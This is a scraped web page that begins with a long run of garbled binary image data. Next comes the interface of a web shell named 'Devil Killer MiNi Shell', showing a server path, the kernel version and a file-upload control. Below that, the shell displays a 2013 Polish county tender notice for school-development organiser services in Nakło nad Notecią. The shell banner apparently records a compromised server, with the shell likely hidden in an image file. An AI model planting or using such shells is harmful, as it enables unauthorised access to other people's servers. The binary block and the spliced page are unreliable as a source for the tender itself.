JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130821/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130821/165567-N-2013.html

<p class="kh_header"><b>Nakło nad Notecią: Przetarg nieograniczony na świadczenie usług polegających na pełnieniu funkcji Szkolnego Organizatora Rozwoju Edukacji w ramach projektu pn. Współczesny nauczyciel - program wsparcia szkół i przedszkoli w powiecie nakielskim współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 165567 - 2013; data zamieszczenia: 21.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Nakielski , ul. Gen. H. Dąbrowskiego 54, 89-100 Nakło nad Notecią, woj. kujawsko-pomorskie, tel. 052 3866628, faks 052 3860771.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nakielski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przetarg nieograniczony na świadczenie usług polegających na pełnieniu funkcji Szkolnego Organizatora Rozwoju Edukacji w ramach projektu pn. Współczesny nauczyciel - program wsparcia szkół i przedszkoli w powiecie nakielskim współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie usług polegających na pełnieniu funkcji Szkolnego Organizatora Rozwoju Edukacji (SORE) w ramach projektu Współczesny nauczyciel - program wsparcia szkół i przedszkoli w powiecie nakielskim współfinansowanego ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki - Priorytet III: Wysoka jakość systemu oświaty, Działanie 3.5 Kompleksowe wspomaganie rozwoju szkół. Usługi skierowane będą bezpośrednio do uczestników projektu, którymi będą dyrektorzy/ki, nauczyciele/ki szkół i przedszkoli 
z powiatu nakielskiego.
Miejsce realizacji zamówienia: szkoły/przedszkola na terenie powiatu nakielskiego zgodnie z podziałem określonym w poszczególnych częściach.
Sposób zatrudnienia - umowa cywilnoprawna
Zakres obowiązków SORE w ramach zamówienia:
spotkanie z dyrektorami szkół/przedszkoli, ustalenie warunków współpracy na cały okres realizacji projektu;
przeprowadzenie wszystkich etapów realizacji rocznych planów wspomagania, w tym:
przeprowadzenie diagnozy potrzeb szkoły/przedszkola oraz dostosowanie oferty doskonalenia do zdiagnozowanych potrzeb (wywiady z dyrektorami, spotkanie z radą pedagogiczną),
przegląd dokumentacji szkolnej,
przeprowadzanie warsztatów diagnostyczno-rozwojowych dla zespołu wyłonionego z rady pedagogicznej,
stworzenie Rocznego Planu Wspomagania (RPW) wraz z harmonogramem realizacji RWP i doborem form doskonalenia,
udział w pracach rekrutacyjnych,
pozyskanie ekspertów zewnętrznych - specjalistów, współpraca z zespołem zarządzającym projektem w celu ustalenia zapotrzebowania na ekspertów do poszczególnych etapów realizacji rocznych planów wspomagania,
konsultacje grupowe podsumowujące warsztaty dla nauczycieli,
konsultacje indywidualne dla nauczycieli 5 h dla każdej jednostki,
przygotowanie i przeprowadzenie ankiet z rocznego przebiegu wspomagania,
bieżące monitorowanie przebiegu wspomagania, reagowanie na pojawiające się trudności,
opracowanie sprawozdania z realizacji RPW i przedstawienie go dyrektorom i nauczycielom oraz w biurze projektu,
przygotowanie rekomendacji do pracy na kolejny rok,
przygotowanie Powiatowego Planu Wspomagania (PPW),
Szczegółowy opis RPW stanowi załącznik nr 9 do SIWZ
stała współpraca z zespołem zarządzającym i osobami zaangażowanymi w realizację projektu, informowanie o zaistniałych zmianach w harmonogramie działań,
organizacja techniczna i logistyczna zaplanowanych spotkań (sale, catering, materiały biurowe) we współpracy z biurem projektu,
dokumentowanie podejmowanych działań (kwartalne sprawozdania dostarczane do biura projektu, miesięczna ewidencja godzin pracy i zadań (o ile taki obowiązek będzie wynikał w wytycznych dotyczących realizacji Programu Operacyjnego Kapitał Ludzki) dostarczana do biura projektu najpóźniej do 5 dnia następnego miesiąca, listy obecności oraz inne dokumenty dostarczane w terminie wyznaczonym przez biuro projektu).
Liczba godzin - 80h miesięcznie (średnio), w całości minimum 800 godzin.
I CZĘŚĆ - PIERWSZY SORE będzie pracował na terenie następujących szkół/przedszkoli:
1. Niepubliczna Szkoła Podstawowa Stowarzyszenia Żakus Anieliny 30, 89-110 Sadki 
2. Gimnazjum Zespołu Szkół Ponadpodstawowych im. Wincentego Witosa w Samostrzelu
Samostrzel 9, 89-110 Sadki 
3. Technikum Zespołu Szkół Ponadpodstawowych im. Wincentego Witosa w Samostrzelu, Samostrzel 9, 89-110 Sadki 
4. Szkoła Podstawowa w Sadkach im. mjra Henryka Sucharskiego, ul. Mickiewicza 1, 89-110 Sadki
5. Szkoła Podstawowa im. Adama Mickiewicza w Witosławiu, Witosław 9, 89-114 Witosław 
6. Gimnazjum im. Jana Pawła II w Mroczy, ul. Sportowa 2, 89-115 Mrocza 
7. Szkoła Podstawowa w Mroczy im. Wojska Polskiego w Mroczy, ul. 30 - LECIA LWP 4, 89-115 Mrocza
II CZĘŚĆ  - DRUGI SORE będzie pracował na terenie następujących szkół/przedszkoli:
1. ZSZ Zespołu Szkół Ponadgimnazjalnych im. Władysława Łokietka w Lubaszczu, Lubaszcz 11 a, 89-100 Nakło nad Notecią
2. Niepubliczna Szkoła Podstawowa im. Powstańców Wielkopolskich w Trzeciewnicy, ul. Powstańców Wielkopolskich 25, 89-100 Nakło nad Notecią 
3. Gimnazjum Zespołu Szkół w Ślesinie, Dworcowa 9, 89-121 Ślesin
4. I Liceum Ogólnokształcące im. Bolesława Krzywoustego w Nakle nad Notecią, ul. Gimnazjalna 3, 89-100 Nakło nad Notecią 
5. Technikum Zespołu Szkół Ponadgimnazjalnych im. Stanisława Staszica w Nakle nad Notecią, ul. Staszica 18, 89-100 Nakło nad Notecią 
6. 2 technika Zespołu Szkół Żeglugi Śródlądowej im. kmdr. Bolesława Romanowskiego w Nakle nad Notecią, ul. Dąbrowskiego 4, 89-100 Nakło nad Notecią 
III CZĘŚĆ - TRZECI SORE będzie pracował na terenie następujących szkół/przedszkoli:
1. Szkoła Podstawowa im. Jana Czochralskiego w Kcyni,  ul. Wyrzyska 12, 89-240 Kcynia 
2. Gimnazjum w Chwaliszewie, 89-240 Kcynia
3. Liceum Ogólnokształcące (Zespół Szkół Ogólnokształcących) w Kcyni, ul. 22 Stycznia 1, 89-240 Kcynia
4. Szkoła Podstawowa nr 1 im. Króla Władysława Jagiełły w Szubinie, ul. Wyzwolenia 21, 89-200 Szubin 
5. Gimnazjum Nr 1 im. Sędziwoja z Szubina w Szubinie, ul. Św. Marcina 11, 89-200 Szubin 
6. I Liceum Ogólnokształcące im. Stanisława Wyspiańskiego w Szubinie, ul. Kcyńska 1, 89-200 Szubin
7. Technikum Zespołu Szkół Ponadgimnazjalnych im. prof. Emila Chroboczka w Szubinie, ul. Kochanowskiego 1, 89-200 Szubin 
IV CZĘŚĆ  - CZWARTY SORE będzie pracował na terenie następujących szkół/przedszkoli:
1. Przedszkole Samorządowe Nr 3 w Szubinie, Plac Kościelny 2, 89- 200 Szubin
2. Przedszkole Miejskie w Mroczy, ul. Łąkowa 5, 89-115 Mrocza
3. Przedszkole Gminy Sadki Dobre Ludki, Sadki, ul. Kościelna, 89-110 Sadki
4. Przedszkole Miejskie im. Ziemi Pałuckiej w Kcynia, ul. Libelta 1, 89-240 Kcynia
5. Przedszkole nr 2 w Nakle nad Notecią, ul. Powstańców Wielkopolskich 11, 89-100 Nakło nad Notecią
6. Szkoła Podstawowa nr 3 im. Konstytucji 3. Maja w Nakle nad Notecią, ul. Mrotecka 1a, 89-100 Nakło nad Notecią  
7. Szkoła Podstawowa nr 2 im. Kardynała Stefana Wyszyńskiego Prymasa Tysiąclecia, ul. Bydgoska 24, 89-100 Nakło nad Notecią 
Dodatkowe informacje:
osoba pełniąca funkcję Szkolnego Organizatora Rozwoju Edukacji musi być osobą z zewnątrz danej placówki;
podejmowane działania na rzecz uczestników projektu organizowane będą zgodnie z potrzebami uczestników od poniedziałku do piątku - zaplanowane działania odbywać mogą się najpóźniej do godziny 20.00, zamawiający zastrzega sobie prawo ewentualnej zmiany dni wykonywania zadań w soboty i niedzielę;
SORE ma obowiązek uczestniczyć w konferencjach i innych zdarzeniach realizowanych w ramach i na potrzeby projektu;
zajęcia odbywać się będą w udostępnionych przez szkoły salach dydaktycznych;
wszelkie dokumenty dotyczące realizacji zajęć muszą zawierać informację o współfinansowaniu szkolenia z Europejskiego Funduszu Społecznego, logotyp Programu Operacyjnego Kapitał Ludzki, logo Unii Europejskiej wraz z podpisem Europejski Fundusz Społeczny, oraz opcjonalnie logo powiatu nakielskiego, zgodnie z Wytycznymi dotyczącymi oznaczenia projektów w ramach Programu Operacyjnego Kapitał Ludzki;
czas dojazdu do szkół/przedszkoli, na zajęcia i inne nie stanowi pracy SORE w ramach miesięcznego rozliczenia godzin pracy. Zamawiający nie pokrywa kosztów dojazdu na miejsce świadczenia usług;
wykonawcy nie przysługuje żadne dodatkowe wynagrodzenie z tytułu wykonywania umowy;
wszelkie materiały niezbędne do przeprowadzenia zajęć przekazane zostaną przez biuro projektu Zamawiającego;
zgodnie z zasadami finansowania Programu Operacyjnego Kapitał Ludzki łączne zaangażowanie jednej osoby w realizację zadań we wszystkich projektach NSRO nie może przekraczać 240 godzin miesięcznie. Wykonawca przed podpisaniem umowy zobowiązany będzie do złożenia stosownego oświadczenia w tym zakresie. 
2. Zaoferowanie przedmiotu zamówienia sprzecznego z wymaganiami Zamawiającego skutkować będzie odrzuceniem oferty
3. Zamawiający zastrzega, że Wykonawca może złożyć ofertę tylko na jedną część zamówienia zgodnie z art. 83 ust 3 ustawy Pzp.
4. Zamawiający nie dopuszcza składania ofert wariantowych i alternatywnych.
5. Zamawiający nie przewiduje zawarcia umowy ramowej.
6. Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów.
7. Zamawiający nie przewiduje zastosowania aukcji elektronicznej.
8. Zamawiający informuje, że nie przewiduje możliwości udzielenia zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6.
9. Zamawiający nie przewiduje rozliczeń z wykonawcą w walutach obcych.
10. Zamawiający nie przewiduje zwrotu kosztów udziału w postępowaniu.
11. Zamawiający nie przewiduje wymagań określonych w art. 29 ust. 4 Pzp.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.40.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy Pzp. 
Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie wykonał (świadczył, realizował, zakończył) lub wykonuje (świadczy, realizuje) co najmniej jedną usługę polegającą na realizacji przynajmniej jednego projektu edukacyjnego</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, składanego przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy Pzp. 
Warunek zostanie spełniony w przypadku wykazania przez wykonawcę dysponowaniem przynajmniej jedną osobą, która posiada wykształcenie wyższe II stopnia, posiada minimum 6 miesięczne doświadczenie w koordynacji pracy zespołów bez konieczności pełnienia roli przełożonego wobec jego członków oraz posiada doświadczenie w pracy nauczyciela lub realizacji usług rozwojowych na rzecz systemu edukacji publicznej i niepublicznej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunku zostanie dokonana według formuły spełnia/nie spełnia na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu oraz dokumentów składanych przez wykonawcę w zakresie wykazania spełniania warunków, o których mowa w art. 22 ust. 1 ustawy Pzp</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz oferty - załącznik nr 1 do SIWZ;
2. pełnomocnictwo, jeżeli oferta będzie podpisana przez pełnomocnika</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 60</li>
<li>2 - Udział w projektach związanych z wdrażaniem zmian w systemie edukacji - 5</li>
<li>3 - Przygotowanie do pracy moderatora, trenera lub coacha - 5</li>
<li>4 - Doświadczenie w moderowaniu grupowej pracy koncepcyjnej osób dorosłych - 5</li>
<li>5 - Kierowanie spotkaniami/warsztatami poświęconymi zespołowemu wypracowaniu rozwiązań określonych problemów - 5</li>
<li>6 - Ukończenie cyklu szkoleń dla Szkolnych Organizatorów Rozwoju Edukacji - 20</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość wprowadzania zmian w umowie w stosunku do treści oferty w zakresie:
1. W przypadku istotnych zmian we wniosku o dofinasowanie dopuszcza się możliwość zmiany w drodze aneksu terminu wykonania przedmiotu umowy.
2. Zmiany warunków i terminów płatności.
3. Zmiany dotyczące podwykonawców i zakresu usług im powierzonych.
4. W przypadku zmiany stawki podatku VAT w trakcie trwania umowy Zamawiający dokona w drodze aneksu uaktualnienia stawki podatku VAT zgodnie z obowiązującą Ustawą od towarów i usług. Uaktualniona stawka podatku VAT będzie obowiązywała w dalszej realizacji przedmiotu zamówienia wynikającej z umowy.
5. W przypadku, gdy wystąpi okoliczność, gdy zbędnym lub niemożliwym stanie się zrealizowanie przedmiotu zamówienia w wymiarze określonym w opisie przedmiotu zamówienia Zamawiający zastrzega sobie prawo pomniejszenia wynagrodzenia za wykonaną usługę,
6. Z przyczyn losowych niezależnych od Wykonawcy (np. długotrwała choroba) w miejsce osoby wskazanej w ofercie Wykonawca w porozumieniu z Zamawiającym powołuje osobę na zastępstwo, posiadającą co najmniej takie same kwalifikacje.
Warunkiem wprowadzenia zmian w umowie jest pisemne zwrócenie się o wyrażenie zgody jednej ze stron na dokonanie zmiany w umowie z podaniem uzasadnienia faktycznego oraz wyrażenie zgody drugiej strony. Wszelkie zmiany wymagają formy pisemnej pod rygorem nieważności takich zmian</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.powiat-nakielski.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nakle nad Notecią ul. Gen. Henryka Dąbrowskiego 54 89-100 Nakło nad Notecią.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.08.2013 godzina 08:45, miejsce: Powiatowe w Nakle nad Notecią Biuro Obsługi Klienta (pokój nr 4) ul. Gen. Henryka Dąbrowskiego 54 89-100 Nakło nad Notecią.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Współczesny nauczyciel - program wsparcia szkół i przedszkoli w powiecie nakielskim Projekt jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I CZĘŚĆ - PIERWSZY SORE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> PIERWSZY SORE będzie pracował na terenie następujących szkół/przedszkoli:
1. Niepubliczna Szkoła Podstawowa Stowarzyszenia Żakus Anieliny 30, 89-110 Sadki 
2. Gimnazjum Zespołu Szkół Ponadpodstawowych im. Wincentego Witosa w Samostrzelu, Samostrzel 9, 89-110 Sadki 
3. Technikum Zespołu Szkół Ponadpodstawowych im. Wincentego Witosa w Samostrzelu, Samostrzel 9, 89-110 Sadki 
4. Szkoła Podstawowa w Sadkach im. mjra Henryka Sucharskiego, ul. Mickiewicza 1, 89-110 Sadki
5. Szkoła Podstawowa im. Adama Mickiewicza w Witosławiu, Witosław 9, 89-114 Witosław 
6. Gimnazjum im. Jana Pawła II w Mroczy, ul. Sportowa 2, 89-115 Mrocza 
7. Szkoła Podstawowa w Mroczy im. Wojska Polskiego w Mroczy, ul. 30 - LECIA LWP 4, 89-115 Mrocza.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.00.00.00-4, 80.40.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 10.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 60</li>
<li>2. Udział w projektach związanych z wdrażaniem zmian w systemie edukacji - 5</li>
<li>3. Przygotowanie do pracy moderatora, trenera lub coacha - 5</li>
<li>4. Doświadczenie w moderowaniu grupowej pracy koncepcyjnej osób dorosłych - 5</li>
<li>5. Kierowanie spotkaniami/warsztatami poświęconymi zespołowemu wypracowaniu rozwiązań określonych problemów - 5</li>
<li>6. Ukończenie cyklu szkoleń dla Szkolnych Organizatorów Rozwoju Edukacji - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II CZĘŚĆ  - DRUGI SORE.</p>
